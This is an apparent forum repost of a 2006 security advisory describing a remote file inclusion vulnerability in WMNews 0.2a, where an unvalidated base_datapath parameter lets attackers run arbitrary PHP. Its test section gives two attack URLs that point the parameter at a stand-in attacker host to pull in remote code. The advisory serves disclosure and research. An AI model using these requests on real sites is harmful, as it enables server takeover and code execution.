邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » [转载]WMNews Base_Datapath远程文件包含漏洞 [查看完整版本]

睡猫 2006-8-3 00:52

[转载]WMNews Base_Datapath远程文件包含漏洞

信息来源：绿盟科技

发布日期：2006-07-27
更新日期：2006-07-28

受影响系统：
Mikael Software WMNews 0.2a
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 19187

WMNews是一款基于PHP和MySQL的新闻自动化系统。

由于没有正确的验证index.php文件中data_basepath参数的输入，导致远程攻击者可以通过包含本地或外部资源执行任意PHP代码。

<*来源：uNfz （[email]unfzbr@hotmail.com[/email]）
  
  链接：[url]http://milw0rm.com/exploits/2077[/url]
      [url]http://secunia.com/advisories/21234/print/[/url]
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

建议：
--------------------------------------------------------------------------------
厂商补丁：

Mikael Software
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

[url]http://wartamikael.org/PHPScripts/[/url]

查看完整版本: [转载]WMNews Base_Datapath远程文件包含漏洞

© 1999-2008 EvilOctal Security Team